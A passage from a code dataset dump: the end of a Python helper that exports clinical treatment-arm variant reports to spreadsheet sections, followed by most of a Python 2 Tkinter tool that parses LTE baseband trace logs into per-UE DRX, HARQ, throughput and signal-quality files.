None: # sometimes the data needs a little massaging first\n field_object = field_preprocessor(field_object)\n\n row = [get_field(field_object, field_name) if field_name is not None else \"\" for field_name in field_names]\n rows.append(row)\n return rows\n\n\ndef extract_variant_report_data(treatment_arm_data):\n variant_report = treatment_arm_data['variantReport']\n\n excl_nhs_rules_data, incl_nhs_rules_data = extract_nonhotspot_rules_data(variant_report)\n\n excl_variants_data, incl_variants_data = extract_variants_data(variant_report)\n\n variant_report_data = {\n 'incl_nonhotspot_rules': incl_nhs_rules_data,\n 'excl_nonhotspot_rules': excl_nhs_rules_data,\n 'incl_variants': incl_variants_data,\n 'excl_variants': excl_variants_data,\n }\n\n return variant_report_data\n\n\ndef extract_variants_data(variant_report):\n\n snv_variants = [dict(**var, **{'type': 'SNV'}) for var in variant_report['singleNucleotideVariants']]\n cnv_variants = [dict(**var, **{'type': 'CNV'}) for var in variant_report['copyNumberVariants']]\n indel_variants = [dict(**var, **{'type': 'Indel'}) for var in variant_report['indels']]\n gf_variants = [dict(**var, **{'type': 'Fusion'}) for var in variant_report['geneFusions']]\n\n all_variants = snv_variants + cnv_variants + indel_variants + gf_variants\n\n excl_variants = [var for var in all_variants if not var.get('inclusion', True)]\n incl_variants = [var for var in all_variants if var.get('inclusion', True)]\n\n excl_variants_data = extract_data({'data': excl_variants}, 'data', VARIANTS_FIELD_NAMES)\n incl_variants_data = extract_data({'data': incl_variants}, 'data', VARIANTS_FIELD_NAMES)\n\n return excl_variants_data, incl_variants_data\n\n\ndef extract_nonhotspot_rules_data(variant_report):\n nonhotspot_rules = variant_report['nonHotspotRules']\n\n excl_nonhotspot_rules = [nhr for nhr in nonhotspot_rules if not nhr.get('inclusion', True)]\n incl_nonhotspot_rules = [nhr for nhr in nonhotspot_rules if nhr.get('inclusion', True)]\n\n excl_nhs_rules_data = extract_data({'data': excl_nonhotspot_rules}, 'data', NONHOTSPOT_RULES_FIELD_NAMES)\n incl_nhs_rules_data = extract_data({'data': incl_nonhotspot_rules}, 'data', NONHOTSPOT_RULES_FIELD_NAMES)\n\n return excl_nhs_rules_data, incl_nhs_rules_data\n\n\ndef add_variant_report_data(eg, treatment_arm_data):\n variant_report_data = extract_variant_report_data(treatment_arm_data)\n eg.add_section(variant_report_data['excl_nonhotspot_rules'], column_names=NONHOTSPOT_RULES_COLUMN_NAMES,\n section_heading=EXCL_NONHOTSPOT_RULES_HEADING, skip_rows=1)\n eg.add_section(variant_report_data['incl_nonhotspot_rules'], column_names=NONHOTSPOT_RULES_COLUMN_NAMES,\n section_heading=INCL_NONHOTSPOT_RULES_HEADING, skip_rows=1)\n eg.add_section(variant_report_data['excl_variants'], column_names=VARIANTS_COLUMN_NAMES,\n section_heading=EXCL_VARIANTS_HEADING, skip_rows=1)\n eg.add_section(variant_report_data['incl_variants'], column_names=VARIANTS_COLUMN_NAMES,\n section_heading=INCL_VARIANTS_HEADING, skip_rows=1)\n","sub_path":"helpers/treatment_arm_download_generator.py","file_name":"treatment_arm_download_generator.py","file_ext":"py","file_size_in_byte":10787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"56787683","text":"#!/app/vbuild/RHEL6-x86_64/python/2.7.9/bin/python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nimport re\nimport math\nimport webbrowser\nimport sys\nimport os\nimport glob\nimport itertools\ntry:\n # for Python2\n from Tkinter import *\nexcept ImportError:\n # for Python3\n from tkinter import *\nfrom tkFileDialog import *\nimport tkMessageBox\n\nif os.path.isfile(sys.argv[1]):\n log_file = os.path.realpath(sys.argv[1])\nelse:\n log_file = raw_input('File entered does not exist. Please enter the correct path to a log file: ')\n\ntry:\n f = open(log_file, 'r')\nexcept IOError:\n print(\"Cannot open \" + log_file)\n sys.exit()\n\nues = []\n\nprint(\"Searching for all UEs from UPCDL.180 traces in the log file specified...\")\n\nfor line in f:\n if \"<!UPCDL.180!>\" in line:\n m = re.search(\"bbUeRef(=0x|=)([0-9,a-f]+)\", line)\n if m.group(2) not in ues:\n ues.append(m.group(2))\nf.close()\n\nmatches = []\n\ndef CurSelect(event):\n # CurSelect is used to return item selected from the Listbox\n global matches\n matches = [lb.get(idx) for idx in lb.curselection()]\n return matches\n\ndef close_window():\n root.destroy()\n\ndef stop():\n root.destroy()\n sys.exit()\n\ndef select_all():\n global matches\n global var\n global all_matches\n if var.get() == 1:\n all_matches = True\n lb.select_set(0, END)\n matches = [lb.get(idx) for idx in lb.curselection()]\n else:\n all_matches = False\n lb.select_clear(0, END)\n del matches[:]\n return matches\n\n\nroot = Tk()\nroot.title(\"DRX Tool\")\n\nins = Label(root, text=\"Please select the UEs you would like to execute the drx tool on.\", font=(\"Times New Roman\", 14))\nins.pack(side=\"right\")\n\ngetBut = Button(root, text='Run', font=(\"Times New Roman\", 12), command = close_window)\ngetBut.pack(side=\"bottom\")\n\nvar = IntVar()\nc = Checkbutton(root, text=\"All UEs\", variable=var, command = select_all)\nc.pack(side=\"bottom\")\n\nsb = Scrollbar(root, orient=\"vertical\")\nsb.pack(side=LEFT, fill=Y)\n\ntitle = Label(root, text=\"UPCDL.180 UEs\", font=(\"Times New Roman\", 14, \"bold\"), relief=\"raise\", width=14)\ntitle.pack(anchor=\"w\")\n\nlb = Listbox(root, selectmode=MULTIPLE, width=26, yscrollcommand=sb.set)\n\nfor item in ues:\n lb.insert((ues.index(item))+1, item)\n\nlb.pack(fill=Y, side=LEFT)\nsb.config(command=lb.yview)\nlb.bind(\"<<ListboxSelect>>\", CurSelect)\n\nroot.protocol(\"WM_DELETE_WINDOW\", stop)\nroot.mainloop()\n\nif (len(matches) == 0) or (matches == None):\n root = Tk()\n root.withdraw()\n tkMessageBox.showinfo(\n \"Error\",\n \"No UEs selected.\"\n )\n sys.exit()\n\nFoldersExist = []\nfor match in matches:\n dirname = \".\" + os.sep + match + \"_\" + os.path.basename(log_file)\n if os.path.exists(dirname):\n root = Tk()\n root.withdraw()\n tkMessageBox.showinfo(\n \"Error\",\n \"DRX information regarding this UE(s) already exists under: \" + str(dirname)\n )\n root.update()\n FoldersExist.append(match)\n\nif len(FoldersExist) == len(matches):\n sys.exit()\n\nfor match in matches:\n if match in FoldersExist:\n print(\" Plot will not be updated for UE: \" + match + \". Files already exist under \" + dirname + \"\\n\")\n continue\n\n dirname = \".\" + os.sep + match + \"_\" + os.path.basename(log_file)\n f = open(log_file, 'r')\n os.makedirs(dirname)\n target = open(dirname + os.sep + match + \"_\" + os.path.basename(log_file) + \".log\", 'w')\n\n noOfTraceblocks = 0\n traceblock = []\n lastTime = 0\n storeTime = 0\n nrOfMatch = 0\n ues = []\n ue = 0\n bbUeRef_hex = int(match, 16)\n\n OrigSfnTimePrint = 0\n PrevOrigSfnTimePrint = 0\n sumValue = 0\n prevsumValue = 0\n inconsistency = 0\n timeDiff = 0\n prevTimeMs = 0\n prevSfnValue = 0\n prevline = None\n\n\n def checkTraceblock():\n global nrOfMatch\n global lastTime\n global storeTime\n myprint = 0\n\n global prevSfnValue\n global prevTimeMs\n global sumValue\n global prevsumValue\n global SfValue\n global OrigSfnTimePrint\n global PrevOrigSfnTimePrint\n global inconsistency\n global prevline\n\n\n for line in traceblock:\n m = re.search(\"[0-9]+:[0-9]+:([0-9]+.[0-9]+)\", line)\n m2 = re.search(\"sfn:([0-9]+)\", line)\n\n if (m and m2):\n TimeMs = float(m.group(1))\n SfnValue = int(m2.group(1))\n\n if SfnValue < prevSfnValue:\n sumValue += SfnValue\n else:\n sumValue += SfnValue - prevSfnValue\n\n if (TimeMs < prevTimeMs):\n timeDiff = 60 - math.fabs(TimeMs - prevTimeMs)\n else:\n timeDiff = math.fabs(TimeMs - prevTimeMs)\n\n if timeDiff >= 0.1:\n if (prevSfnValue is not 0) and (prevTimeMs is not 0):\n inconsistency = 1\n else:\n inconsistency = 0\n\n prevSfnValue = SfnValue\n\n if(inconsistency):\n target.write(\"TIME GAP > 10 MS\\n\")\n target.write(prevline)\n target.write(line)\n\n prevTimeMs = TimeMs\n prevsumValue = sumValue\n prevline = line\n\n m = re.search(\"^\\[[-: 0-9]+.([0-9]+)\\]\", line)\n if m:\n storeTime = m.group(1)\n\n # Check if the this line includes the specific match\n if (match in line) or (str(bbUeRef_hex) in line):\n myprint = 1\n nrOfMatch+=1\n\n # Extract the UE references in the log\n m = re.search(\"sessionRef=([0-9,a-f]+),\", line) or re.search(\"bbUeRef=0x([0-9,a-f]+)\", line) or re.search(\"bbUeRef=([0-9,a-f]+)\", line)\n if m:\n if m.group(1) not in ues:\n ue = m.group(1).replace(\",\", \"\")\n ues.append(ue) # new ueref, add to array...\n\n # check also bbBearerRef and determine the bbUeRef\n m = re.search(\"bbBearerRef(\\s|=)([0-9]+) \", line)\n if m:\n p = int(m.group(2)) & 0xFFFFFFE0\n if(p == match):\n line.rstrip()\n target.write(line + \"(bbUeRef=)\" + str(p))\n\n # Check if the current TraceBlock shall be included in the outputfile\n if myprint == 1:\n timediff = int(storeTime) - int(lastTime)\n timediff_mm = int(timediff/1000)\n lastTime = storeTime\n while timediff_mm >= 1:\n target.write(\"*\")\n timediff_mm-=1\n target.write(\"\\n\")\n target.write(\" \".join(traceblock))\n\n print(\"Running...\")\n for line in f:\n m = re.search(\"0x[0-9abcdef]+=\", line) or re.search(\"^\\[[-:. 0-9]+\\]\", line)\n if m: # example \"0x5051e916=\"\"\n noOfTraceblocks+=1\n checkTraceblock()\n del traceblock[:]\n traceblock.append(line)\n else:\n traceblock.append(line)\n\n print (\"\\n********** General Information for UE: \" + match + \"********************************************************\\n\")\n print (\" Total number of Traceblocks: %s\\n\" % noOfTraceblocks)\n print (\" Matched TraceBlocks: %i\\n\" % nrOfMatch)\n\n f.close()\n target.close()\n\n'''***************************************************************************************************************************************************************************************************************************\n******************************************************************************************************************************************************************************************************************************\n******************************************************************************************************************************************************************************************************************************'''\n\nfor match in matches:\n if match in FoldersExist:\n continue\n\n dirname = \".\" + os.sep + match + \"_\" + os.path.basename(log_file)\n f = open(dirname + os.sep + match + \"_\" + os.path.basename(log_file) + \".log\", 'r')\n DRXDLFILE = open(dirname + os.sep + match + \"_drx_dl.txt\", 'w')\n DRXFILE = open(dirname + os.sep + match + \"_rx_event_ul.txt\", 'w')\n DRXULFILE = open(dirname + os.sep + match + \"_drx_ul.txt\", 'w')\n RXPOWERPUSCHFILE = open(dirname + os.sep + match + \"_rxpower_pusch.txt\", 'w')\n ULNEWTBSFILE = open(dirname + os.sep + match + \"_ultbs_new.txt\", 'w')\n ULRETXTBSFILE = open(dirname + os.sep + match + \"_ultbs_retx.txt\", 'w')\n DLNEWFILE = open(dirname + os.sep + match + \"_dl_new.txt\", 'w')\n DLRETXFILE = open(dirname + os.sep + match + \"_dl_retx.txt\", 'w')\n DLTBSFILE = open(dirname + os.sep + match + \"_dltbs.txt\", 'w')\n PUCCHSRFILE = open(dirname + os.sep + match + \"_sr.txt\", 'w')\n ULSINRFILE = open(dirname + os.sep + match + \"_ulsinr.txt\", 'w')\n ULHARQACKFILE = open(dirname + os.sep + match + \"_ulharqack.txt\", 'w')\n ULHARQNACKFILE = open(dirname + os.sep + match + \"_ulharqnack.txt\", 'w')\n DRXUPDATEFILE = open(dirname + os.sep + match + \"_drxupdateind.txt\", 'w')\n DRXDLSKIPONDURATION = open(dirname + os.sep + match + \"_drxdl_skip_onduration.txt\", 'w')\n TIMESTAMP = open(dirname + os.sep + match + \"_timestamp.txt\", 'w')\n NEWDRXCONFIGINDEX = open(dirname + os.sep + match + \"_new_drx_config_index.txt\", 'w')\n NEWDRXSTARTOFFSET = open(dirname + os.sep + match + \"_new_drx_start_offset.txt\", 'w')\n NEWLONGDRXCYCLE = open(dirname + os.sep + match + \"_new_long_drx_cycle.txt\", 'w')\n DC_DT = open(dirname + os.sep + match + \"_dc_dt.txt\", 'w')\n INCONSISTENCY = open(dirname + os.sep + match + \"_inconsistency.txt\", 'w')\n\n noOfTraceBlocks = 0\n begin = 0\n traceblock = []\n storeTime = 0\n i = 0\n wrapDelay = 0\n\n srReceived = 0\n oldState = 0\n inactivity = 4\n drxLongCycle = 0\n drxShortCycle = 0\n drxShortUl = 2\n oldStateUl = 0\n oldInactivity = None\n oldInactivityUl = None\n inactivityUl = 4\n\n drxShort = 2\n oldShortCycleTimer = 0\n dtx = 0\n\n currentTimeTmp = None\n currentTime = None\n\n dlAllocInd = 0\n firstTime = 1\n newTti = 0\n missedTti = 0\n firstTti = 0\n lastTti = 0\n\n onType = 0\n\n dlDrxTraceAvailable = 0\n ulDrxTraceAvailable = 0\n\n ulMacCtrlInfo = None\n ulMeas2Ul = None\n ulAllocInd = None\n dlAllocInd = None\n\n validSample = None\n\n bfnTimePrint = None\n sfnTimePrint = None\n prevsfnTimePrint = None\n sfn = 0\n\n currentSfn = 0\n prevSfn = 0\n sumSfn = 0\n firstSfn = 1\n firstSfnValue = 0\n sfnWrap = 0\n\n prevTimeMs = 0\n prevSfnValue = 0\n\n OrigSfnTimePrint = 0\n PrevOrigSfnTimePrint = 0\n\n sumValue = 0\n prevsumValue = 0\n inconsistency = None\n timeDiff = 0\n\n prevline = ''\n\n TimeFinal = None\n TimeInit = None\n\n TimeGap = 0\n\n def timestamps2ms(timestamp):\n global currentTime\n global currentTimeTmp\n numbers = [0.1, 15, 61440]\n m = re.search(\"0x([\\dA-Fa-f]{3})([\\dA-Fa-f]{2})([\\dA-Fa-f]{3})\", timestamp)\n if m:\n t = [int(m.group(1), 16), int(m.group(2), 16), int(m.group(3), 16)]\n currentTimeTmp = 0.0\n for i in xrange(0, len(t)):\n currentTimeTmp += (t[i] / numbers[i])\n\n currentTime = int(currentTimeTmp)\n\n def getInfo(line):\n global TimeMs\n global sfnTimePrint\n global sfnWrap\n global firstSfn\n global sumSfn\n global prevSfn\n global firstSfnValue\n global currentSfn\n\n m = re.search(\"sfn:([0-9]+)\", line)\n m2 = re.search(\"sf:([0-9])\", line)\n m3 = re.search(\"[0-9]+:[0-9]+:([0-9]+.[0-9]+)\", line)\n\n currentSfn = int(m.group(1))\n sf = int(m2.group(1))\n TimeMs = float(m3.group(1))\n\n if firstSfn:\n firstSfn = 0\n firstSfnValue = currentSfn\n\n if currentSfn < prevSfn:\n sumSfn += currentSfn\n else:\n sumSfn += currentSfn - prevSfn\n\n sfnTimePrint = str(sumSfn) + str(sf)\n sfnWrap = int((sumSfn - currentSfn - firstSfnValue) / 1024)\n\n def gapDifference(line):\n global sfnTimePrint\n global prevsfnTimePrint\n global prevSfn\n global TimeMs\n global prevTimeMs\n global inconsistency\n\n if (TimeMs < prevTimeMs):\n timeDiff = 60 - math.fabs(TimeMs - prevTimeMs)\n else:\n timeDiff = math.fabs(TimeMs - prevTimeMs)\n\n if timeDiff >= 0.1:\n if (prevSfn is not 0) and (prevTimeMs is not 0):\n inconsistency = 1\n else:\n inconsistency = 0\n\n if(inconsistency):\n INCONSISTENCY.write(str(prevsfnTimePrint) + \" \" + str(timeDiff) + \"\\n\")\n INCONSISTENCY.write(str(sfnTimePrint) + \" \" + str(timeDiff) + \"\\n\")\n\n def checkTraceblock():\n global wrapDelay\n global storeTime\n global i\n global newTti\n global missedTti\n global firstTti\n global lastTti\n global ulMacCtrlInfo\n global ulMeas2Ul\n global ulAllocInd\n global dlAllocInd\n global validSample\n global oldState\n global drxShort\n global inactivity\n global dtx\n global oldInactivity\n global drxLongCycle\n global drxShortCycle\n global srReceived\n global oldShortCycleTimer\n global dlDrxTraceAvailable\n global ulDrxTraceAvailable\n global drxShortUl\n global oldStateUl\n global inactivityUl\n global firstTime\n global onType\n global bfnTimePrint\n global oldInactivityUl\n global UlL1Harqfdbk\n global dlHarqValid\n global TimeGap\n global prevline\n global startTimeGap\n global TimeInit\n global TimeFinal\n global prevSfn\n global prevsfnTimePrint\n global prevTimeMs\n global ALL\n global OFF\n\n tbsDl = 0\n tbsUl = 0\n ulRetx = 0\n ulNewTx = 0\n\n ############\n dlAllocInd = 0\n ulAllocInd = 0\n ulMacCtrlInfo = 0\n ulMeas2Ul = 0\n ulMeas2Ul = 0\n validSample = 0\n UlL1Harqfdbk = 0\n dlHarqValid = 0\n ############\n\n # Check each line in the TraceBlock for matching parts.\n for line in traceblock:\n\n #############################################################################\n # Extract SFN, SF, and Time stamp\n #############################################################################\n\n m = re.search(\"^\\[[-:. 0-9]+\\]\", line)\n if m:\n getInfo(line)\n\n #############################################################################\n # Extract Time Gap\n #############################################################################\n\n m = re.search(r'\\bTIME GAP > 10 MS\\b', line)\n if m:\n TimeGap = 1\n TimeInit = None\n TimeFinal = None\n\n elif((TimeGap) and (TimeInit is None)):\n TimeInit = TimeMs\n\n elif((TimeGap) and (TimeFinal is None) and (TimeInit is not None)):\n gapDifference(line)\n TimeGap = 0\n\n prevline = line\n prevSfn = currentSfn\n prevsfnTimePrint = sfnTimePrint\n prevTimeMs = TimeMs\n\n #############################################################################\n # Extract BFN\n #############################################################################\n\n m = re.search(\"(0x[0-9abcdef]+)=.*\", line)\n if m:\n timestamps2ms(m.group(1))\n\n # Handle Time wrap\n if ((wrapDelay == 0) and (storeTime > (currentTime + 3000))):\n i+=1\n wrapDelay = 100\n storeTime = currentTime\n\n # handling a wrap window, due to traces not always sorted in time. Will not update store until after the window.\n if(wrapDelay > 0):\n wrapDelay-=1\n else:\n storeTime = currentTime;\n\n # remove 40960 if \"old bfn\" turn up in the logfile\n if ((i > 0) and (storeTime > (storeTime + 2000))):\n bfnTimePrint = currentTime + (40960*(i - 1))\n print (\"removing 40960 from bfn time: \" + str(bfnTimePrint) + \"\\n\")\n else:\n bfnTimePrint = currentTime + (40960*i)\n\n #############################################################################\n # TTI (transmission time interval) print\n #############################################################################\n\n if bfnTimePrint > newTti:\n if bfnTimePrint > (newTti + 1):\n missedTti+=1\n newTti = bfnTimePrint\n\n if firstTti == 0:\n firstTti = bfnTimePrint\n lastTti = bfnTimePrint\n\n m = re.search(\"(\\d+-\\d+-\\d+)\", line)\n m2 = re.search(\"([0-9]+:[0-9]+:[0-9]+.[0-9]+)\", line)\n m3 = re.search(\"sfn:([0-9]+)\", line)\n m4 = re.search(\"sf:([0-9]+).([0-9]+)\", line)\n if m:\n date = m.group(1)\n timestamp = m2.group(1)\n sfnvalue = int(m3.group(1))\n sfvalue = str(m4.group(1)) + \".\" + str(m4.group(2))\n #TIMESTAMP.write(str(sfnTimePrint) + \" \" + str(date) + \"_\" + str(timestamp) + \"_\" + str(sfnvalue) + \"_\" + str(sfvalue) + \"\\n\")\n TIMESTAMP.write(str(sfnTimePrint) + \" \" + str(date) + \" \" + str(timestamp) + \"\\n\")\n\n #############################################################################\n # Get UL HARQ Info\n #############################################################################\n\n m = re.search(\"UpUlMacPeCiUlMacCtrlInfoIndS?\", line)\n if m:\n ulMacCtrlInfo = 1\n\n m = re.search(\".*HarqFeedbackAck.*\", line) #NOT FOUND IN LOGS\n if ((ulMacCtrlInfo == 1) and (m)):\n ULHARQACKFILE.write(str(sfnTimePrint) + \" 1.5\\n\")\n if(firstTime):\n ULHARQNACKFILE.write(str(sfnTimePrint) + \" 0.5\\n\")\n firstTime = 0\n\n m = re.search(\".*HarqFeedbackNack.*\", line) #NOT FOUND IN LOGS\n if ((ulMacCtrlInfo == 1) and (m)):\n ULHARQNACKFILE.write(str(sfnTimePrint) + \" 1.75\\n\")\n\n m = re.search(\"UpUlMacPeCiUlL1Harqfdbk2DlIndS?\", line)\n if m:\n UlL1Harqfdbk = 1\n\n m = re.search(\"dlHarqValid(\\s| = )1\", line)\n if m:\n dlHarqValid = 1\n\n m = re.search(\"nrOfTb(\\s| = )([-0-9]+)\", line)\n if m:\n nrOfTb = int(m.group(2))\n\n m = re.search(\"detectedHarqIndication(\\s| = )([-0-9]+)\", line)\n if (dlHarqValid == 1) and (UlL1Harqfdbk == 1) and (m):\n if (int(m.group(2)) == 0): #NACK/NACK\n if (nrOfTb == 1):\n ULHARQNACKFILE.write(str(sfnTimePrint) + \" 1.75\\n\")\n elif (nrOfTb == 2):\n ULHARQNACKFILE.write(str(sfnTimePrint) + \" 1.75\\n\")\n ULHARQNACKFILE.write(str(sfnTimePrint) + \" 1.75\\n\")\n elif (int(m.group(2)) == 1): #NACK/ACK\n if (nrOfTb == 1):\n ULHARQACKFILE.write(str(sfnTimePrint) + \" 1.5\\n\")\n elif (nrOfTb == 2):\n ULHARQNACKFILE.write(str(sfnTimePrint) + \" 1.75\\n\")\n ULHARQACKFILE.write(str(sfnTimePrint) + \" 1.5\\n\")\n elif (int(m.group(2)) == 2): #ACK/NACK\n if (nrOfTb == 1):\n ULHARQACKFILE.write(str(sfnTimePrint) + \" 1.5\\n\")\n elif (nrOfTb == 2):\n ULHARQACKFILE.write(str(sfnTimePrint) + \" 1.5\\n\")\n ULHARQNACKFILE.write(str(sfnTimePrint) + \" 1.75\\n\")\n elif (int(m.group(2)) == 3): #ACK/ACK\n if (nrOfTb == 1):\n ULHARQACKFILE.write(str(sfnTimePrint) + \" 1.5\\n\")\n elif (nrOfTb == 2):\n ULHARQACKFILE.write(str(sfnTimePrint) + \" 1.5\\n\")\n ULHARQACKFILE.write(str(sfnTimePrint) + \" 1.5\\n\")\n elif (int(m.group(2)) == 4): #DTX\n ULHARQNACKFILE.write(str(sfnTimePrint) + \" 1.75\\n\")\n dlHarqValid = 0\n\n #############################################################################\n # Get Scheduling Request in UL\n #############################################################################\n\n m = re.search(\"UpUlMacPeCiUlL1Measrprt2UlIndS? \", line)\n if m:\n ulMeas2Ul = 1\n\n m = re.search(\"pucchSrReport \", line) #nrOfPucchSrReports and pucchSrReportList\n if (ulMeas2Ul == 1) and (m):\n PUCCHSRFILE.write(str(sfnTimePrint) + \" 1.5\\n\")\n\n m = re.search(\"nrOfPucchSrReports(\\s| = )([-0-9]+)\", line)\n if (ulMeas2Ul == 1) and m:\n if (int(m.group(2) != 0)):\n PUCCHSRFILE.write(str(sfnTimePrint) + \" 1.5\\n\")\n\n #############################################################################\n # Get TBS in DL\n ############################################################################\n\n m = re.search(\"UpDlMacPeCiDlUeAllocIndS? \", line)\n if m:\n dlAllocInd = 1\n\n m = re.search(\"tbSizeInBytes(\\s| = )([-0-9]+)\", line)\n if (dlAllocInd == 1) and (m):\n tbsDl = 1\n\n if(tbsDl > 0):\n DLTBSFILE.write(str(sfnTimePrint) + \" \" + str(tbsDl) + \"\\n\")\n\n #############################################################################\n # Get NEW and RETX data in DL\n #############################################################################\n\n m = re.search(\"newDataFlag(\\s| = )(1|true)\", line)\n if (dlAllocInd == 1) and m:\n DLNEWFILE.write(str(sfnTimePrint) + \" 1\" + \"\\n\")\n\n m = re.search(\"newDataFlag(\\s| = )(0|false)\", line)\n if (dlAllocInd == 1) and m:\n DLRETXFILE.write(str(sfnTimePrint) + \" 0\" + \"\\n\")\n\n #############################################################################\n # Get TBS in UL\n #############################################################################\n\n m = re.search(\"UpUlMacPeCiUlUeAllocIndS? \", line)\n if m:\n ulAllocInd = 1\n\n m = re.search(\"newDataFlag(\\s| = )(1|true)\", line)\n if (ulAllocInd == 1) and m:\n ulNewTx = 1\n\n m = re.search(\"newDataFlag(\\s| = )(0|false)\", line)\n if (ulAllocInd == 1) and m:\n ulRetx = 1\n\n m = re.search(\"tbs(\\s|=){([-0-9]+)\", line)\n if (ulAllocInd == 1) and m:\n tbsUl = (int(m.group(2))/8)\n if(ulNewTx):\n ULNEWTBSFILE.write(str(sfnTimePrint) + \" \" + str(tbsUl) + \"\\n\")\n ulNewTx = 0\n if(ulRetx):\n ULRETXTBSFILE.write(str(sfnTimePrint) + \" \" + str(tbsUl) + \"\\n\")\n ulRetx = 0\n\n #############################################################################\n # Get rxpower and SINR for PUSCH when not DTX\n #############################################################################\n\n m = re.search(\"isDtx(\\s| = )(1|true)\", line)\n if m:\n dtxSample = 1\n\n m = re.search(\"isDtx(\\s| = )(0|false)\", line)\n if m:\n validSample = 1\n\n m = re.search(\"rxPowerReport(\\s| = )([-0-9]+)\", line)\n if(validSample == 1) and m:\n rxpowerpusch = int(m.group(2))/10\n RXPOWERPUSCHFILE.write(str(sfnTimePrint) + \" \" + str(rxpowerpusch) + \"\\n\")\n\n m = re.search(\"sinr(\\s| = )([-0-9]+)\", line)\n if(validSample == 1) and m:\n ulsinr = int(m.group(2))/10\n ULSINRFILE.write(str(sfnTimePrint) + \" \" + str(ulsinr) + \"\\n\")\n\n #############################################################################\n # Get DRX UL\n #############################################################################\n\n m = re.search(\"drxActive=([0-1])\", line)\n if m:\n if(oldStateUl != m.group(1)):\n DRXULFILE.write(str(sfnTimePrint) + \" \" + str(oldStateUl) + \" \" + str(drxShortUl) + \" \" + str(inactivityUl) + \"\\n\")\n DRXULFILE.write(str(sfnTimePrint) + \" \" + str(m.group(1)) + \" \" + str(drxShortUl) + \" \" + str(inactivityUl) + \"\\n\")\n oldStateUl = m.group(1)\n ulDrxTraceAvailable = 1\n\n m = re.search(\"shortDrxCycleTime=([0-9]+)\", line)\n m1 = re.search(\"shortDrxCycleTime=-1\", line)\n if m:\n drxShortUl = 3\n DRXULFILE.write(str(sfnTimePrint) + \" \" + str(oldStateUl) + \" \" + str(drxShortUl) + \" \" + str(inactivityUl) + \"\\n\")\n elif m1:\n DRXULFILE.write(str(sfnTimePrint) + \" \" + str(oldStateUl) + \" \" + str(drxShortUl) + \" \" + str(inactivityUl) + \"\\n\")\n drxShortUl = 2\n DRXULFILE.write(str(sfnTimePrint) + \" \" + str(oldStateUl) + \" \" + str(drxShortUl) + \" \" + str(inactivityUl) + \"\\n\")\n\n m = re.search(\"IATime=([0-9]+)\", line) or re.search(\"inactivityTime=([0-9]+)\", line)\n m1 = re.search(\"IATime=-1\", line) or re.search(\"inactivityTime=-1\", line)\n if m:\n if oldInactivityUl != m.group(1):\n DRXULFILE.write(str(sfnTimePrint) + \" \" + str(oldStateUl) + \" \" + str(drxShortUl) + \" \" + str(inactivityUl) + \"\\n\")\n oldInactivityUl = m.group(1)\n inactivityUl = 5\n DRXULFILE.write(str(sfnTimePrint) + \" \" + str(oldStateUl) + \" \" + str(drxShortUl) + \" \" + str(inactivityUl) + \"\\n\")\n elif m1:\n DRXULFILE.write(str(sfnTimePrint) + \" \" + str(oldStateUl) + \" \" + str(drxShortUl) + \" \" + str(inactivityUl) + \"\\n\")\n inactivityUl = 4\n DRXULFILE.write(str(sfnTimePrint) + \" \" + str(oldStateUl) + \" \" + str(drxShortUl) + \" \" + str(inactivityUl) + \"\\n\")\n\n #############################################################################\n # Get DRX DL\n #############################################################################\n\n m = re.search(\"SCTime=([0-9]+)\", line)\n m1 = re.search(\"SCTime=-1\", line)\n if m:\n if(oldShortCycleTimer != m.group(1)):\n oldShortCycleTimer = int(m.group(1))\n drxShort = 3\n DRXDLFILE.write(str(sfnTimePrint) + \" \" + str(oldState) + \" \" + str(drxShort) + \" \" + str(inactivity) + \" 0 \" + str(dtx) + \"\\n\")\n elif m1:\n DRXDLFILE.write(str(sfnTimePrint) + \" \" + str(oldState) + \" \" + str(drxShort) + \" \" + str(inactivity) + \" 0 \" + str(dtx) + \"\\n\")\n drxShort = 2\n DRXDLFILE.write(str(sfnTimePrint) + \" \" + str(oldState) + \" \" + str(drxShort) + \" \" + str(inactivity) + \" 0 \" + str(dtx) + \"\\n\")\n\n m = re.search(\"ONType=([3-4])\", line)\n if m:\n onType = int(m.group(1))/2\n DRXDLSKIPONDURATION.write(str(sfnTimePrint) + \" \" + str(onType) + \"\\n\")\n\n m = re.search(\"c=([0-1]) r=\", line)\n if m:\n if oldState != m.group(1):\n DRXDLFILE.write(str(sfnTimePrint) + \" \" + str(oldState) + \" \" + str(drxShort) + \" \" + str(inactivity) + \" 0 \" + str(dtx) + \"\\n\")\n DRXDLFILE.write(str(sfnTimePrint) + \" \" + str(m.group(1)) + \" \" + str(drxShort) + \" \" + str(inactivity) + \" 0 \" + str(dtx) + \"\\n\")\n oldState = m.group(1)\n dlDrxTraceAvailable = 1\n\n m = re.search(\"IATime=([0-9]+)\", line)\n m1 = re.search(\"IATime=-1\", line)\n if m:\n if(oldInactivity != m.group(1)):\n DRXDLFILE.write(str(sfnTimePrint) + \" \" + str(oldState) + \" \" + str(drxShort) + \" \" + str(inactivity) + \" 0 \" + str(dtx) + \"\\n\")\n oldInactivity = m.group(1)\n inactivity = 5\n DRXDLFILE.write(str(sfnTimePrint) + \" \" + str(oldState) + \" \" + str(drxShort) + \" \" + str(inactivity) + \" 0 \" + str(dtx) + \"\\n\")\n elif m1:\n DRXDLFILE.write(str(sfnTimePrint) + \" \" + str(oldState) + \" \" + str(drxShort) + \" \" + str(inactivity) + \" 0 \" + str(dtx) + \"\\n\")\n inactivity = 4\n DRXDLFILE.write(str(sfnTimePrint) + \" \" + str(oldState) + \" \" + str(drxShort) + \" \" + str(inactivity) + \" 0 \" + str(dtx) + \"\\n\")\n\n m = re.search(\"UpcDlMacCeFiUeDrxUpdateIndS?\", line)\n if m:\n DRXUPDATEFILE.write(str(sfnTimePrint) + \" 1.5\\n\")\n\n #############################################################################\n # CR2525 Information\n #############################################################################\n\n m = re.search(\"nrOfDtxInARowDl=([0-9]+)\", line)\n if m:\n dtx = ((int(m.group(1))/10) + 1)\n DRXDLFILE.write(str(sfnTimePrint) + \" \" + str(oldState) + \" \" + str(drxShort) + \" \" + str(inactivity) + \" 0 \" + str(dtx) + \"\\n\")\n\n m = re.search(\"dtxCnt(\\s|=)([-0-9]+)\", line)\n if m:\n dtx = ((int(m.group(2))/10) + 1)\n DRXDLFILE.write(str(sfnTimePrint) + \" \" + str(oldState) + \" \" + str(drxShort) + \" \" + str(inactivity) + \" 0 \" + str(dtx) + \"\\n\")\n\n #################################################################################\n # EVENTS from the UL Calendar function\n #################################################################################\n ####\n #### 